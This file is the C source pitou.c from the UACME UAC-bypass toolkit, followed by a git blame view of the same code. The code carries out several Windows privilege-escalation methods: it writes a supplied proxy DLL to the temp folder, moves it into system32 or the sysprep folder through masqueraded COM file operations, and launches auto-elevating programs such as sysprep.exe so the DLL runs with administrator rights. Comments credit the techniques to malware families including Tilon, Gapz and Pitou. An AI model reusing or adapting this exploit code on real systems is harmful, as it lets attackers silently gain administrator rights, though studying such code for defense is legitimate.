UACME/Source/Akagi/methods/pitou.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2019
*
*  TITLE:       PITOU.C
*
*  VERSION:     3.18
*
*  DATE:        29 Mar 2019
*
*  Leo Davidson based IFileOperation auto-elevation.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmSysprepMethodsCleanup
*
* Purpose:
*
* Post execution cleanup routine for sysprep methods.
*
*/
BOOL ucmSysprepMethodsCleanup(
    UCM_METHOD Method
)
{
    BOOL bResult;
    LPWSTR lpTarget;
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, g_ctx->szSystemDirectory);

    if (Method == UacMethodSysprep4) {

        _strcat(szBuffer, OOBE_EXE);
        bResult = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
        if (bResult) {
            _strcpy(szBuffer, g_ctx->szSystemDirectory);
            _strcat(szBuffer, UNBCL_DLL);
            bResult = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
        }
        return (bResult);

    }
    else {

        _strcat(szBuffer, SYSPREP_DIR);

        switch (Method) {

        case UacMethodSysprep1:
            lpTarget = CRYPTBASE_DLL;
            break;

        case UacMethodSysprep2:
            lpTarget = SHCORE_DLL;
            break;

        case UacMethodSysprep3:
            lpTarget = DBGCORE_DLL;
            break;

        case UacMethodSysprep5:
            lpTarget = UNATTEND_DLL;
            break;

        case UacMethodTilon:
            lpTarget = ACTIONQUEUE_DLL;
            break;

        default:
            return FALSE;
        }

        _strcat(szBuffer, lpTarget);

        return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
    }
}

/*
* ucmOobeMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for OobeMethod.
*
*/
BOOL ucmOobeMethodCleanup(
    VOID
)
{
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, g_ctx->szSystemDirectory);
    //%systemroot%\system32\oobe\"
    _strcat(szBuffer, L"oobe\\");
    _strcat(szBuffer, WDSCORE_DLL);

    return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
}

/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions.
*
*/
NTSTATUS ucmStandardAutoElevation2(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    WCHAR SourceFilePathAndName[MAX_PATH + 1];
    WCHAR DestinationFilePathAndName[MAX_PATH + 1];

    do {

        //source filename of dll
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx->szTempDirectory);
        _strcat(SourceFilePathAndName, UNBCL_DLL);

        if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
            MethodResult = STATUS_UNSUCCESSFUL;
            break;
        }

        //copy %temp\unbcl.dll -> system32\unbcl.dll
        if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx->szSystemDirectory)) {
            MethodResult = STATUS_UNSUCCESSFUL;
            break;
        }

        //source filename of process
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx->szSystemDirectory);
        _strcat(SourceFilePathAndName, SYSPREP_DIR);
        _strcat(SourceFilePathAndName, SYSPREP_EXE);

        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx->szTempDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        //system32\sysprep\sysprep.exe -> temp\oobe.exe
        if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {
            MethodResult = STATUS_UNSUCCESSFUL;
            break;
        }

        //temp\oobe.exe -> system32\oobe.exe
        if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx->szSystemDirectory)) {
            MethodResult = STATUS_ACCESS_DENIED;
            break;
        }

        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx->szSystemDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        if (supRunProcess(DestinationFilePathAndName, NULL))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    return MethodResult;
}

/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1   - Original Leo Davidson concept.
* UacMethodSysprep2   - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon      - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3   - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodSysprep5   - Leo Davidson concept with different target dll, used by 0kit/Gapz.
* UacMethodOobe       - WinNT/Pitou derivative from Leo Davidson concept.
*
*/
NTSTATUS ucmStandardAutoElevation(
    _In_ UCM_METHOD Method,
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS    MethodResult = STATUS_ACCESS_DENIED;
    WCHAR       szSourceDll[MAX_PATH * 2];
    WCHAR       szTargetDir[MAX_PATH * 2];
    WCHAR       szTargetProcess[MAX_PATH * 2];


    _strcpy(szSourceDll, g_ctx->szTempDirectory);
    _strcpy(szTargetDir, g_ctx->szSystemDirectory);
    _strcpy(szTargetProcess, g_ctx->szSystemDirectory);

    switch (Method) {

    case UacMethodSysprep1:

        //%temp%\cryptbase.dll
        _strcat(szSourceDll, CRYPTBASE_DLL);

        //%systemroot%\system32\sysprep      
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe    
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep2:

        //%temp\\shcore.dll
        _strcat(szSourceDll, SHCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep3:

        //%temp%\dbgcore.dll
        _strcat(szSourceDll, DBGCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodOobe:

        //%temp%\wdscore.dll
        _strcat(szSourceDll, WDSCORE_DLL);

        //%systemroot%\system32\oobe\"
        _strcat(szTargetDir, L"oobe\\");

        //%systemroot%\system32\oobe\setupsqm.exe
        _strcat(szTargetProcess, SETUPSQM_EXE);

        break;

    case UacMethodTilon:

        //%temp%\ActionQueue.dll
        _strcat(szSourceDll, ACTIONQUEUE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep5:

        //%temp%\Unattend.dll
        _strcat(szSourceDll, UNATTEND_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    default:
        return ERROR_INVALID_PARAMETER;
    }

    do {

        if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize)) {
            MethodResult = STATUS_UNSUCCESSFUL;
            break;
        }

        if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir)) {
            MethodResult = STATUS_ACCESS_DENIED;
            break;
        }

        if (supRunProcess(szTargetProcess, NULL))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    return MethodResult;
}
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`/*******************************************************************************`
			`*`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`* (C) COPYRIGHT AUTHORS, 2014 - 2019`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* TITLE: PITOU.C`
			`*`
v 3.1.8 Method 57 added (mostly for historical purposes), wd compatibility fixes. 2019-03-29 18:06:01 +00:00			`* VERSION: 3.18`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 3.1.8 Method 57 added (mostly for historical purposes), wd compatibility fixes. 2019-03-29 18:06:01 +00:00			`* DATE: 29 Mar 2019`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* Leo Davidson based IFileOperation auto-elevation.`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`
			`#include "global.h"`

v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`/*`
			`* ucmSysprepMethodsCleanup`
			`*`
			`* Purpose:`
			`*`
			`* Post execution cleanup routine for sysprep methods.`
			`*`
			`*/`
			`BOOL ucmSysprepMethodsCleanup(`
			`UCM_METHOD Method`
			`)`
			`{`
			`BOOL bResult;`
			`LPWSTR lpTarget;`
			`WCHAR szBuffer[MAX_PATH * 2];`

			`_strcpy(szBuffer, g_ctx->szSystemDirectory);`

			`if (Method == UacMethodSysprep4) {`

			`_strcat(szBuffer, OOBE_EXE);`
			`bResult = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);`
			`if (bResult) {`
			`_strcpy(szBuffer, g_ctx->szSystemDirectory);`
			`_strcat(szBuffer, UNBCL_DLL);`
			`bResult = ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);`
			`}`
			`return (bResult);`

			`}`
			`else {`

			`_strcat(szBuffer, SYSPREP_DIR);`

			`switch (Method) {`

			`case UacMethodSysprep1:`
			`lpTarget = CRYPTBASE_DLL;`
			`break;`

			`case UacMethodSysprep2:`
			`lpTarget = SHCORE_DLL;`
			`break;`

			`case UacMethodSysprep3:`
			`lpTarget = DBGCORE_DLL;`
			`break;`

v 3.1.8 Method 57 added (mostly for historical purposes), wd compatibility fixes. 2019-03-29 18:06:01 +00:00			`case UacMethodSysprep5:`
			`lpTarget = UNATTEND_DLL;`
			`break;`

v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`case UacMethodTilon:`
			`lpTarget = ACTIONQUEUE_DLL;`
			`break;`

			`default:`
			`return FALSE;`
			`}`

			`_strcat(szBuffer, lpTarget);`

			`return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);`
			`}`
			`}`

			`/*`
			`* ucmOobeMethodCleanup`
			`*`
			`* Purpose:`
			`*`
			`* Post execution cleanup routine for OobeMethod.`
			`*`
			`*/`
			`BOOL ucmOobeMethodCleanup(`
			`VOID`
			`)`
			`{`
			`WCHAR szBuffer[MAX_PATH * 2];`

			`_strcpy(szBuffer, g_ctx->szSystemDirectory);`
			`//%systemroot%\system32\oobe\"`
			`_strcat(szBuffer, L"oobe\\");`
			`_strcat(szBuffer, WDSCORE_DLL);`

			`return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);`
			`}`

v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00			`/*`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* ucmStandardAutoElevation2`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00			`*`
			`* Purpose:`
			`*`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList`
			`*`
v 3.0.0 Internal redesign, methods 49, 50, 51 added, readme updated. 2018-09-02 07:28:59 +00:00			`* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions.`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00			`*`
			`*/`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`NTSTATUS ucmStandardAutoElevation2(`
v 2.8.5 Some internal rearrange. 2017-12-17 03:58:48 +00:00			`_In_ PVOID ProxyDll,`
			`_In_ DWORD ProxyDllSize`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`)`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00			`{`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`NTSTATUS MethodResult = STATUS_ACCESS_DENIED;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`WCHAR SourceFilePathAndName[MAX_PATH + 1];`
			`WCHAR DestinationFilePathAndName[MAX_PATH + 1];`

			`do {`

			`//source filename of dll`
			`RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));`
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`_strcpy(SourceFilePathAndName, g_ctx->szTempDirectory);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(SourceFilePathAndName, UNBCL_DLL);`

v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {`
			`MethodResult = STATUS_UNSUCCESSFUL;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
			`//copy %temp\unbcl.dll -> system32\unbcl.dll`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx->szSystemDirectory)) {`
			`MethodResult = STATUS_UNSUCCESSFUL;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
			`//source filename of process`
			`RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));`
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`_strcpy(SourceFilePathAndName, g_ctx->szSystemDirectory);`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`_strcat(SourceFilePathAndName, SYSPREP_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(SourceFilePathAndName, SYSPREP_EXE);`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));`
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`_strcpy(DestinationFilePathAndName, g_ctx->szTempDirectory);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(DestinationFilePathAndName, OOBE_EXE);`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`//system32\sysprep\sysprep.exe -> temp\oobe.exe`
			`if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`MethodResult = STATUS_UNSUCCESSFUL;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
			`}`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`//temp\oobe.exe -> system32\oobe.exe`
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx->szSystemDirectory)) {`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`MethodResult = STATUS_ACCESS_DENIED;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
			`}`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));`
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`_strcpy(DestinationFilePathAndName, g_ctx->szSystemDirectory);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(DestinationFilePathAndName, OOBE_EXE);`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (supRunProcess(DestinationFilePathAndName, NULL))`
			`MethodResult = STATUS_SUCCESS;`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`} while (FALSE);`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`return MethodResult;`
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00			`}`

Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`/*`
			`* ucmStandardAutoElevation`
			`*`
			`* Purpose:`
			`*`
			`* Leo Davidson AutoElevation method with derivatives.`
			`*`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* UacMethodSysprep1 - Original Leo Davidson concept.`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`* UacMethodSysprep2 - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* UacMethodTilon - Leo Davidson concept with different target dll, used by Win32/Tilon.`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`* UacMethodSysprep3 - Windows 10 TH1 adapted UacMethodSysprep1.`
v 3.1.8 Method 57 added (mostly for historical purposes), wd compatibility fixes. 2019-03-29 18:06:01 +00:00			`* UacMethodSysprep5 - Leo Davidson concept with different target dll, used by 0kit/Gapz.`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`* UacMethodOobe - WinNT/Pitou derivative from Leo Davidson concept.`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`*`
			`*/`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`NTSTATUS ucmStandardAutoElevation(`
v 2.8.5 Some internal rearrange. 2017-12-17 03:58:48 +00:00			`_In_ UCM_METHOD Method,`
			`_In_ PVOID ProxyDll,`
			`_In_ DWORD ProxyDllSize`
v 2.7.0 Wow64 logger added as #30, newest Enigma0x3 method added as #31, overall program redesign and rewrite of several methods, fixes and Simda method #5 works again (fixed regression of previous builds), Yuubari updated for Win10 rs2 15063. 2017-03-25 12:39:31 +00:00			`)`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`{`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`NTSTATUS MethodResult = STATUS_ACCESS_DENIED;`
			`WCHAR szSourceDll[MAX_PATH * 2];`
			`WCHAR szTargetDir[MAX_PATH * 2];`
			`WCHAR szTargetProcess[MAX_PATH * 2];`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00
v 1.8 Method 10 reworked, MS signature removed, readme updated to reflect latest win10 build 10166 changes. 2015-07-11 10:13:14 +00:00
v 3.1.1 Internal rearrange (contexts and building as dll for kuma). 2018-12-12 07:44:47 +00:00			`_strcpy(szSourceDll, g_ctx->szTempDirectory);`
			`_strcpy(szTargetDir, g_ctx->szSystemDirectory);`
			`_strcpy(szTargetProcess, g_ctx->szSystemDirectory);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
			`switch (Method) {`

			`case UacMethodSysprep1:`

			`//%temp%\cryptbase.dll`
			`_strcat(szSourceDll, CRYPTBASE_DLL);`

			`//%systemroot%\system32\sysprep`
			`_strcat(szTargetDir, SYSPREP_DIR);`

v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`//%systemroot%\system32\sysprep\sysprep.exe`
			`_strcat(szTargetProcess, SYSPREP_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, SYSPREP_EXE);`

			`break;`

			`case UacMethodSysprep2:`

			`//%temp\\shcore.dll`
			`_strcat(szSourceDll, SHCORE_DLL);`

			`//%systemroot%\system32\sysprep`
			`_strcat(szTargetDir, SYSPREP_DIR);`

			`//%systemroot%\system32\sysprep\sysprep.exe`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`_strcat(szTargetProcess, SYSPREP_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, SYSPREP_EXE);`

			`break;`

			`case UacMethodSysprep3:`

			`//%temp%\dbgcore.dll`
			`_strcat(szSourceDll, DBGCORE_DLL);`

			`//%systemroot%\system32\sysprep`
			`_strcat(szTargetDir, SYSPREP_DIR);`

			`//%systemroot%\system32\sysprep\sysprep.exe`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`_strcat(szTargetProcess, SYSPREP_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, SYSPREP_EXE);`

			`break;`

			`case UacMethodOobe:`

			`//%temp%\wdscore.dll`
			`_strcat(szSourceDll, WDSCORE_DLL);`

			`//%systemroot%\system32\oobe\"`
			`_strcat(szTargetDir, L"oobe\\");`

			`//%systemroot%\system32\oobe\setupsqm.exe`
			`_strcat(szTargetProcess, SETUPSQM_EXE);`

			`break;`

			`case UacMethodTilon:`

			`//%temp%\ActionQueue.dll`
			`_strcat(szSourceDll, ACTIONQUEUE_DLL);`

			`//%systemroot%\system32\sysprep`
			`_strcat(szTargetDir, SYSPREP_DIR);`

			`//%systemroot%\system32\sysprep\sysprep.exe`
v 2.4.0 bugfix 2016-07-06 17:11:21 +00:00			`_strcat(szTargetProcess, SYSPREP_DIR);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`_strcat(szTargetProcess, SYSPREP_EXE);`

			`break;`

v 3.1.8 Method 57 added (mostly for historical purposes), wd compatibility fixes. 2019-03-29 18:06:01 +00:00			`case UacMethodSysprep5:`

			`//%temp%\Unattend.dll`
			`_strcat(szSourceDll, UNATTEND_DLL);`

			`//%systemroot%\system32\sysprep`
			`_strcat(szTargetDir, SYSPREP_DIR);`

			`//%systemroot%\system32\sysprep\sysprep.exe`
			`_strcat(szTargetProcess, SYSPREP_DIR);`
			`_strcat(szTargetProcess, SYSPREP_EXE);`

			`break;`

v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`default:`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`return ERROR_INVALID_PARAMETER;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`}`

			`do {`

v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize)) {`
			`MethodResult = STATUS_UNSUCCESSFUL;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir)) {`
			`MethodResult = STATUS_ACCESS_DENIED;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00			`break;`
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`}`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`if (supRunProcess(szTargetProcess, NULL))`
			`MethodResult = STATUS_SUCCESS;`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`} while (FALSE);`
v 2.1.0 Method 17 added (14316 support), COM methods improved, various fixes. 2016-04-16 03:46:41 +00:00
v 3.1.7 Internal rearrange, post execution cleanup routines for methods 1, 2, 3, 8, 12, 17 2019-03-19 08:47:16 +00:00			`return MethodResult;`
Initial commit v 1.1.0 2015-03-28 12:00:29 +00:00			`}`